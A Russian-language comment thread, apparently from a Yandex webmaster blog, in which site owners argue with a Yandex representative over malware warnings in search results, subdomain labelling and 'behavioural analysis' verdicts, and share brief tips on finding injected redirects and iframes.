Что доказывает - сайт не представлял никакой угрозы пользователям.

И это реально доказуемо , благодаря имеющемуся бэкапу.

Но еще раз, даже если я ошибаюсь, НЕ В ЭТОМ ВОПРОС.

Почему то всю переписку и Вы и ранее Ваши коллеги старательно увиливают от главного заданного вопроса:

Какое моральное и юридическое право имеет Яндекс навешивать "Черную Метку Яндекса" на сайты пользователей, особенно на незараженные?

Каспер, Симантек и пр., найдя что нить, предупреждают, локализуют на карантин, а не блокируют весь компьютер, дабы уберечь других пользователей. А и у них есть ложные срабатывния.

Действительно, мы пошли по второму кругу. Вас, к сожалению, не получается убедить, что у пользователя есть право на то, чтобы в интернете его компьютер на заразили вирусами, что заботиться о пользователях – не право, а обязанность, и что если на сайте есть вредоносный код, то сайт заражённый.

Мы не блокируем сайты, а даём пользователю выбор, переходить ли на сайт, на котором нашли вредоносный код. Примерно в 1% случаев пользователи игнорируют предупреждения и переходят. Файлы из карантина файловых антивирусов тоже возвращают довольно редко.

Хорошо, давайте честно следовать Вашей логике: вешаем на все сайты в зоне .ru вывеску (частично Вы уже это делаете в поддоменах), так будем же последовательны, господа:

" Будьте осторожны, в Интернете работают злоумышленники, возможно заражение, подумайте прежде чем отрывать сайт".

Ведь взломать и заразить могут реально любой сайт в любой момент времени.

И посмотрим :

1.Как быстро юристы "монстров" закатают в асфальт Вашу команду.

2.Каких денег будет стоить Яндексу такая форма заботы о пользователях.

Вы уходите от ответа об обоснованности меток на "чистых" сайтах.

Логика разметки поддоменов описана здесь, я уже сегодня давал эту ссылку. Даже если просто следовать этой логике, то так как к корневому домену зоны .ru не привязан заражённый сайт, то все его поддомены автоматически размечать не нужно. Кроме того, случаи заражения доменов первого уровня и региональных доменов второго уровня разбираются вручную. Заражений доменов первого уровня ещё не видели.

Сайты с сотнями тысяч уникальных пользователей в сутки заражаются в среднем раз в несколько дней. За прошлый год было более 120 случаев заражения таких сайтов. Мы их размечаем точно так же, как и все остальные. Обычно они успевают удалить вредоносный код всего за несколько часов, хотя тоже бывает, что не устраняют причину заражения, и злоумышленники снова этот код добавляют. Довольно часто на таких сайтах появляется новый, сложный вредоносный код, который первое время иначе, как нашими собственными технологиями, не детектируется.

Если «чистый» сайт размечен, то с вероятностью не меньше 99,5% (для поведенческого анализа – не меньше 99,98%) он не «чистый», а распространяет вредоносный код. Точность известна по результатам еженедельной ручной перепроверки репрезентативных выборок вердиктов. Ищите так, если не получится – ищите так, и сможете получить браузерный вредоносный код.


А вот что конкретно на стороне веб-сервера выдаёт вредоносный код в браузер, и как это там появилось – на нашей стороне во многих случаях не видно. Есть десятки вариантов, основные описаны в Помощи Яндекс.Вебмастера и в этом блоге.

Но почему же

... так как к корневому домену зоны .ru не привязан заражённый сайт

Все сайты Name.ru получается привязаны к .ru ?

Но мы опять отклонились от сути проблемы.

Итак, есть сайт shop.domen.ru

1. Яндекс вэбмастер говорит, что сайт безопасен.

2. В поиске висит на сайте черная метка "представляет опасность для Вашего компьютера"

3. Оказывается , что безопасный сайт имеет эту метку только потому, что Ваша команда приняла топорную логику разметки всех сайтов указанную здесь.

4. Пользователь не знает о Вашей логике, верит Вашим выводам.

Полагаю, данную ситуацию иначе как клеветой не назовешь?

Лживый вердикт на безопасном сайте -вот , что это такое.

Введение в заблуждение пользователей - это и есть забота ?

Знаете, исторически, "лучшими побуждениями вымощена дорога в ад".

И думается я прав, поскольку Вы старательно обходите ответ на конкретный вопрос.

Вероятность, проценты , все сайты условно здоровы, это все не о том.

Сайт, о котором я говорю, был безопасен в момент разметки Яндексом, был безопасен при проверке тем же Яндексом, остается безопасен до сих пор. Все дело, в данном случае, только во лживой информации , появившейся в результате логики , опубликованной здесь

И еще, не следует подменять понятия. Разумеется, зараженные сайты с сотнями тыс. уников претензий не предъявляют.

А вот если Вы ни за что, ни про  что пометите их (безопасных и не зараженных) на основании логики здесь, вот тогда думаю за дело возмуться юристы. Сотни тысяч потерянных клиентов - ПОРВУТ!

Вы уходите от ответа об обоснованности меток на "чистых" сайтах. 


Нет, третьего круга объяснений не будет.

Да, редкое нежелание услышать другую сторону. :(

Вопрос не по теме:

Как здесь зафиксировать режим просмотра, чтобы видеть всю переписку и посты не прятались? Ну очень неудобно.

Я смотрю яндекс возомнил себя самым антивирусным антивирусом. Ни один антивирус ничего не находит, только ты, о великий яндекс. Скажи мне, как в суде ты будешь это доказывать? Ты даже, о великий и могучий, не можешь показать мне ни одной страницы с вредоносным кодом. Так голословщина...

Все сюда http://genproc.gov.ru/contacts/ipriem/address/send/

Дорогой Александр, как сенйчас все любят вокруг говорить: "это ваше право". Подайте на меня в суд на основании этой статьи. И, да, в прокуратуре не нужны доказательства, она будет проводить проверку на основании жалобы, так что готовьтесь, пора юристами поднимать зп.

В большинстве случаев мы не отправляем вебмастерам семплов вредоносного кода с их сайтов, чтобы, если вебмастером представился злоумышленник, не помогать ему изменить код так, чтобы он перестал детектироваться. Если ваш случай заражения простой и распространённый, информация о том, на что похож вредоносный код, есть в Вебмастере.

А вы мне всё-таки отправьте на электронку указанную в whois, или там тоже злоумышленники могли подправить информацию?

Очень правомерный вопрос

Нет не удержусь повторю цитату в тему:

Является ли клеветой навешивание ярлыка "Опасный сайт" на чистый и не зараженный (по мнению того же Яндекса) сайт, только на том основании , что он находиться в том же домене, что и "подозрительный" ?

Цитирую ответ из переписки с техподдержкой Яндекса, на всякий случай:

    "Система устроена так, что при обнаружении вредоносного кода на домене его поддомены также помечаются в результатах поиска."

И письмецо то это бережно сохранено. :)

Не просто в том же домене, что и заражённый сайт, а только на поддомене. Есть большая разница.

Если сайт на домене заражён, значит, злоумышленники управляют тем, что будет выдаваться при обращении к его поддоменам. Детали здесь.

Да как не назовите. Злоумышленники еще не то могут.

Но зачем же усугублять Вашими действиями?

Вы не понимаете , что наносите еще больший вред? От тех ребят есть хоть какая то защита, а от Вас нет.

И не надо про то , что антивирусы не ловят. Народ давно ставит продукты класса Интернет секьюрити, которые и браузер защищают, и др. сетевую активнось кконтролируют.

Просто антивирь каспера и тот контролирует вредоносный код на страницах.

Кто Вас просил в таких извращенных формах беcпокоиться о пользователях?

Факт в том, что вы опорочили чистый сайт интернет-магазин, работающий на другом движке, лежащий на другом сервере, чистый по мнению Яндекса только потому, что его название shop."подозрительный домен".ru

А ответа на поставленный вопрос, так  нет? :) Одно словоблудие :(

 

"Здесь" особенно вдохновил пост:

29 июля 2011 года, 03:38

Ну эти правила как-то говорят о бессилиии Яндекса проверять заражения(( Вы бы еще внедрили правило: если сайт на домене .ru заражен, то все поддомены заражены.....

У меня сайт о сериале карпов-2 заразился непонятно откуда?Как найти код ,если его реально нет?

А еще в законе "О защите прав потребителей" есть понятие "Навязанная услуга".

Так вот интересно:

1. Просил ли массовый пользователь , представляющую услугу поиска компанию Яндекс, об оказании услуги защиты его от опасных сайтов?

2. Предупрежден ли он заранее, о том, что его подключили к услуге защиты его от опасных сайтов?

3. Сделал ли он осознанный выбор об использовании услуги защиты его от опасных сайтов?

4. Есть ли у пользователя средство явным образом отказаться от использования услуги защиты его от опасных сайтов?

Если ответ "Нет", то .....

 

 

Вердикт - Поведенческий анализ.

Популярные антивирусы (как и у многих комментаторов здесь) оказались бессильны, считая сайт безопасным.

'Перекапывание' файлов на хостинге ручками, показало наличие 302 редиректа на фишинговый сайт в файле .htaccess для мобильных устройств путем перехвата HTTP_USER_AGENT

У кого антивирусы говорят - всё ок, стоит проверить.

Сложнее будет найти 'дыру' через которую 'гости' чувствуют себя на чужих хостингах как у себя дома...

 

Яндексу - почему бы не выдавать вебмастеру более подробную информацию? Более детальный ответ (тип, название, имя, и/или т.п.) от продукта антивирусной компании который используется. Вебмастерам обнаружить зловредный код будет проще, а значит быстрее = меньше зараженных машин, больше плюсиков Яндексу!  

 

Бред какой то. На сайте вирус!! Где??? Проверил 39 мировыми антивирусными сервисами. Кроме Яндекса никто вируса не видит!! А посетителей меньше на половину стало. Провокация какая то.

Присоединяюсь!! 

Что я могу сказать, столкнулся с той же стороной...

Антивирусы и сторонние ресурсы по on-line поиску сообщают, что сайт чистый, а вот Yandex вывалил черную метку. Многие клиенты с контакта не могут попасть на сайт, потому как видят предупреждение... Жесть... Сайт нигде ничем не менялся, изменений в логах не было... Ничего трогалось ручками, обращений к файлам тоже в логах сервера не фиксируется...

Обратился к поддержке яндекса, чтобы указали слабое место на сайте.

Пальцем ткнули в скрипт, который висит на сайте уже более полугода. Удалил код, отписался в техподдерку снова. Ждем вердикта от службы поддержки.

 

Поэтому пишем в техподдержку и интересуемся, что не нравится этому антивирусу. Ребята там отзываются при желании.

Добрый день. У нас как специалистов уже достаточно большой опыт по очистке сайтов от вирусов! Хитростей хакеры использют очень много.

Почистили уже более 200 проектов.

Если вам важно быстро восстановить рабоспособность сайта - обращайтесь к специалистам нашей команды.

Можно просто набрать в интернете: веб студия миллор

или связаться с нами по телефону 8800 555-37-52

я нашла у себя iframe именно такой конструкции  в виджете (в сайдбаре)  в форме группы в Фейсбуке.Удалила виджет, кода не стало Может кому пригодится.

Забавно, если бы Антивирус Касперского при нахождении вируса писал бы "Найдён вирус, где конкретно не скажу, примите меры, иначе компьютер выключу и больше не включу. Приняли меры и не нашли? Ваши проблемы. Выключаю."

Бред ваш "Безопасный поиск Яндекса" уже несколько раз срабатывает что у меня вредоносный код на страницах, и он то появляется то проподает, никаких левых шаблонов скриптов и т.д. и т.п., причем скрипты как и код статичен и не меняется

http://www.kupolin.ru/dwelling/ нет вирусов, а яндек банит, тем более на сайте на платформе битрикс с проактивной защитой , а также проверка на вирусы на доктор вед и на других  результат вирусов нет , что за хрень с яндексом, почему позиции сбиваете?

Тут было сказанно, что Яндекс не предоставляет информацию вебмастерам о вредоносном коде якобы под видом вебмастера может оказаться злоумышленник. Хорошо, впринципе логично.

Но, предствте ситуацию. Вы установили на комп антивирус, допустим Касперский. Приступили к полной проверке компьютера. Допустим Каспер нашел вирусы.

И теперь представте такой отчет от Антивируса: На вашем компьютере обнаружены вирусы. Какие файлы являются вирусом, и какие из них заражены, ищите сами, и лечите тоже сами!.

Да уж, что за хрень?! Требую предоставлять Вебмастерам то что вы там нашли на их сайтах, иначе получается то же самое что я описал выше.

Кого блокировали. Гляньте через мазилу, правой кнопкой на страницах, Исходный код. И увидете базе64 , вообщем закодировали изображения на сайте. Проверить можно навести мыш на изображение и щёлкнуть Открыть изображение. вверху в адресной стр. будет этот код.

типо того:

 


Я не пойму этот яНДЕКС. За последние записи в вебмастере никаких действий с сайтом не производилось, да и очень сомневаюсь что там что-то есть. Что самое странное ругается только на 1 страницу вордпресса, если и есть вирус, то почему на других то нет?

Результат выборочной проверки

Дата последней проверкиСтраницаВердикт
06.08.2013http://eg-war.ru/pamyatki/pamyatka-3-transportirovka-resursov-na-skladПоведенческий анализ


Последние записи в вебмастере.

6.08.2013

Последняя проверка сайта 6 Августа 2013 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.

1.08.2013

Cайт был перепроверен 1 Августа 2013. К сожалению, на сайте остались страницы, содержащие вредоносный код.

28.07.2013

Последняя проверка сайта 28 Июля 2013 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.

Прошу обязательно включить в текст, который выдает Вебмастер, фразу

 

"Проверьте содержимое файлов .htaccess в корневой и других каталогах сайта - на наличие странных или непонятных правил, созданных явно не ВАми"

Недавно вышло сообщение что сайт http://rumeds.ru/ был заражён, потом оказалось что это было ошибкой.
Интересно, после такой ошибки посещаемость сайта не упадёт?

После каждой выдачи яндекса повялется сообщение мол на сайте xbox360net.org есть какой то вред. код, уже который раз проверял не могу понять что за вирус

Пусть Яша конкретно указывает на файл или часть кода, тогда можно будет понять что он считает вирусом. А то скоро с таким отношением можно в контенте оставить только текст, а все теги и скрипты посносить !!!

Не реклама! 4 дня сайт был у яндекса зараженным. Читал эту ветку и кто то ниже давал ссылку на сайт назамок. Зарегился. Написал в техподдержку. Ответ " У вас там есть скрипт исполняемый, вы можете глянуть его в деталях сайта ') //-->

На сколько нам известно это вирус " Проверил вручную все страницы и нашел эту гадину. Послал запрос вчера на перепроверку. Сегодня сайт в незараженных. RS. Ни один антивирус - 

 ничего не показал!!!

И вот ответ от Яши. " Здравствуйте, Анатолий!


В настоящий момент с Вашим сайтом все в порядке, он прошёл перепроверку и не помечен как угрожающий безопасности компьютера.
Обнаруженный на сайте вредоносный код выглядел следующим образом:



--
Просим Вас высказать свое мнение о полученном ответе: http://feedback2.yandex.ru/appraisal.xml?session=32ad8a59ca29dfe3d808e0b8abd3e3fff9a29868-27318927-57233143

С уважением, Платон Щукин
Служба поддержки Яндекса
http://help.yandex.ru/

Добрый день. У нас как специалистов уже достаточно большой опыт по очистке сайтов от вирусов! Хитростей хакеры использют очень много.

Почистили уже более 200 проектов.

Если вам важно быстро восстановить рабоспособность сайта - обращайтесь к специалистам нашей команды.

Можно просто набрать в интернете: веб студия миллор

или связаться с нами по телефону 8800 555-37-52

У меня была проблема с сайтом. Спасибо что подсказали где искать,  а то бы так и не нашел. Все исправил, жду подтверждения. 

такая же проблема как и у всех..

ни каких кодов на странице нет, ничего не менял, ни кто сайт  не взламывал,

антивирус показывает что всё нормально,

но яндекс упёрся и всё испортил!))

однако на ТИЦ это не отразилось и даже наоборот увеличился))

правда увеличение бесполезное, т.к. посещение упало до нуля))

 

 

 

 

 

 

 

 

 

 

Запустили, как обычно, недоделанный инструмент!!!! Парьтесь уважаемые вебмастера с нашим чудом! А из техподдержки один ответ: Сейчас все нормально, значек снят. Я и сам вижу что он снят, но на следующий день та же самая фигня.....

Kонсультации Онлайн ivacademy.net
6 октября 2013, 16:04

У нас тоже этот глюченый робот яндекса срабатывает постоянно на моих проектах пишу в поддерку и люди-специалисты проверяя ничего ненаходят, включая нам сайт в поиске - покупателеи то отпугивает зтот бан. Никакого ява нету на сайте только чистая жумла и виртуа март без доп плагинов. Создается впечатление что яндекс как касперскии  кричит что вирусы напали припугнуть людеи чтоб покупали у них по и сервисы

Интересно получается- Яндекс блокирует сайт с 10.12.13 (заявка так же на перепроверку отправлена 10.12.13.) и в вебмастере яндекс ссылается на "Поведенческий анализ" и на  Sophos    а сам  Sophos  если судить по онлайн проверкам у разных онлайн сервисов не в курсе что сайт вредоносный :-D- если он не в курсе и нечего на сайте не находит как впрочем и другие антивирусы -с какого такого перепуга на сайт навесили ярлык вредоносного ? вот проверка  за 15.12.13:

 http://antivirus-alarm.ru/proverka/

и в других онлайн сервисах тоже самое

Как вешать ярлыки так быстро выходит а как снимать так неделю  или больше ждать приходится и поддержка вебмастера как воды в рот набрала и не отвечает (уверен что ответит как только снимется этот ярлык когда уже поздно будет что бы узнать в чём заключалась проблема и как всегда простой отпиской что с сайтом всё в порядке>:-)) .хотя бы сказали какой такой вредоносный Java-апплет яндекс не устраивает ? Если быстро вешаете ярлыки так и снимайте так же быстро (как на гугл в течении суток) а не несколько дней как написано проверки занимают !!!


"10.12.2013 оставлена заявка на проверку сайта. Перепроверка в период с 10.12.2013 по 15.12.2013 не удалась. Очередная перепроверка займёт несколько дней". и как понимать это - что проверка не удалась по какой причине ? Если по причине  что вредоносный код  присутствует на сайте то но по данным Sophos  и других антивирусов сайт чистый !!!!!!


Яндекс тоже обнаружил какуюто фигню по "поведенческим". Просмотр исходного кода ничего не дал. А вто когда все же догадался глянуть код на выходе тут вскрылся код. Так что ищите лучше.

на моем kreditovik.com.ua тоже самое((( все проверил, но яндекс все равно ругается.

 

У меня все время находят Поведенческий анализ в одной и той же новости http://borivit.com/index.php?newsid=270(движок дле) хотя там нет никакого вредоносного кода только текст и картинки даже ссылок нет. И главное то что пару раз ничего не находило когда убрал картинку, а потом снова начало находить. Проверял разными антивирусами ничего не находит, а яндекс находит проблемы на ровном месте.

Какая то лажа с этим сервисом проверки сайта, помечает мой сайт как потенциально опасный. Вот гугл, доктор веб и другие онлайн проверки никаких вирусов не показали, а ваш почему то ругается( Сайт на юкозе, дизай паблик, прикуплен пакет снятие бесплатной рекламы и домен, вирусов в файлах и скриптах нет и быть не может! Кому интересно адрес сайта http://fffishing.com

Александр Тимофеев
9 ноября 2014, 20:05

уважаемые а почему код попандера вредоносный? 

А какое отношение поиск имеет непосредственно к заходу из мозилы? Набираешь url сайта, а тебя не пускает. Отличный вариант избавлятся без объяснения причин от большинства неугодных сайтов и форумов. :-@

Тоже самое у меня, проверил все, нет ни каких редиректов на сторонние ресуры, все чисто в .js .php  и так далее... 

Причем они мне присылают якобы URL но это ЗАПРОСЫ... в них нет ничего вообще

Опускаются руки... стена пофигизнми и наплевательства

Yandex самый умный! Вы знаете, что бывает с теми, кто считает себя самым-самым...

 http://sitecheck.sucuri.net/results/photoshope.ru 

 

не пойму за что заблокировали ни за что чтоли? http://dekor.net.ua/

bazhenichev2010
17 мая 2015, 11:47

Пишут что на сайте(pcyhologia.ru) вредоносный код, а по факту его нет. Проверял всевозможными антивирусами включая manual от яндекса ничего НЕТ. Отправил на перепроверку написали что код не найден все впорядке, а страницы из поиска отвалились, посещаемость соответственно упала почти до 0. Где-то через неделю опять таже история вредоносный код. Проверил - ничего нет.((( Что делать-то...

Скачала рекомендуемый Яндексом Манул, но  он на сайт не устанавливается, выдается запись: Архив не удалось установить. Корректных плагинов не найдено.
В чем проблема?
Яндекс пишет,что сайт заражен, однако в гугле такой проблемы нет. Во всех браузерах,кроме Опера, сайт открывается нормально, без предупреждающего красного восклицательного знака! Если  Яндекс обнаружил вредоносный код, то скажите где он? А размазывать сопли можно долго и безуспешно!  И вредоносного кода нет и посетителей на сайте нет и стоит запись: Сайт представляет угрозу... 
firstlena.pershina
17 июля 2016, 16:18
olg689,
 Напишите, пожалуйста, в поддержку Вебмастера, мы постараемся помочь с нахождением вируса. 
Пишет на странице вирус... Но где там ифрейм или еще какой  вредоносный яваскрипт код???
antinup,
Для такой аналитике лучше обратиться в поддержку Яндекс.Вебмастера. Она точнее сможет сориентировать именно по вашей проблеме. 
Добавил на свой сайт http://nakrytka-golosov.ru сбор пользователей из Контакта - Яндекс определил этот код как вирусный.. Так кому верить? Зачем тогда распространять код определения посетителей легально...Чудеса.
Обновлено 24 декабря 2016, 17:14
cenbka,
Увы, часто поставщики услуг не предупреждают, чем чревато для сайта быть замеченным за кликджекингом: https://yandex.ru/blog/webmaster/21745 
Но сбор пользовательских данных без их ведома - это не самые честные приемы. 
iceberg.name давно перезалит дистрибьютив, яндекс до сих пор ругается на страницы( поведенческий анализ) от 27 августа, в сентябре все заново перезалито, но яндекс основываясь на старых данных все еще не снял предупреждение о вирусе. Гугл еще в начале сентября быстро среагировал и снял предупреждение о вирусе.
firstlena.pershina
19 сентября, 14:07
rolsroys,
Отправьте на перепроверку через Вебмастер, если не поможет - напишите в поддержку Яндекса.